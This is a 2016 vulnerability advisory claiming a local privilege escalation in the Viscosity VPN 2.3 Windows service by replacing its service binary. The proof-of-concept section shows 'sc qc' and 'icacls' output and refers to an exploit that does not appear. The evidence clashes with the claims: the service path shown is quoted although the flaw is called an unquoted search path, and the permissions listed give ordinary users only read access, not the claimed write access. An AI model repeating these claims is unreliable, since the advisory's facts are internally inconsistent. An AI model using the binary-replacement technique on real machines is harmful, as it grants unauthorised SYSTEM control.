Viscosity Open VPN 2.3 Privilege Escalation
Posted on 13 December 2016
# Title : Viscosity Open VPN 2.3 Privilege Escalation # Date : 28/11/2016 # Author : Ajay Gowtham aka AJOXR # Tested on : Windows 10 ( Latest version x64 bit) # Software : https://www.sparklabs.com/downloads/Viscosity%20Installer.exe # Vulnerability Description: # When the Viscosity VPN software is installed a service with name #ViscosityService is installed. # The service itself has the right permissions which do not allow to reconfigure #the binary # but the path the binary is writable by any authenticated user. [#] Product & Service Introduction: =================================== Viscosity makes it easy for users new to VPNs to get started. Its clear and intuitive interface makes creating, configuring, or importing connections a snap. Read our detailed "Introduction to VPN" guide for an extensive introduction to VPNs and how to get started using Viscosity. [#] Technical Details & Description: ==================================== The application suffers from an unquoted search path issue in the official Viscosity software. The issue allows authorized but unprivileged local users to execute arbitrary code with system privileges on the active system. The attack vector of the issue is local. [#] Proof of Concept (PoC): =========================== The issue can be exploited by local attackers with restricted system user account or network access and without user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. -----------------------------------------------POC------------------------------------------ C:>sc qc ViscosityService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ViscosityService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:Program FilesViscosityViscosityService.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Viscosity Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem ------------------------------------------------------------------------------------------------------ C:Program FilesViscosity>icacls "C:Program FilesViscosity" C:Program FilesViscosity NT SERVICETrustedInstaller:(I)(F) <------------Everyone Has Full Permissions NT SERVICETrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITYSYSTEM:(I)(F) NT AUTHORITYSYSTEM:(I)(OI)(CI)(IO)(F) BUILTINAdministrators:(I)(F) BUILTINAdministrators:(I)(OI)(CI)(IO)(F) BUILTINUsers:(I)(RX) BUILTINUsers:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITYALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) Successfully processed 1 files; Failed processing 0 files This exploit takes as a parameter an exe file that will replace the ViscosityService.exe and will run with full privileges when the service/computer is restarted. [#] Vulnerability Disclosure Timeline: ====================================== 2016-11-28 : Discovery of the Vulnerability 2016-12-04 : Contact the Vendor (No Response Support Team) 2016-12-12 : Public Disclosure [#] Disclaimer: =============== Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
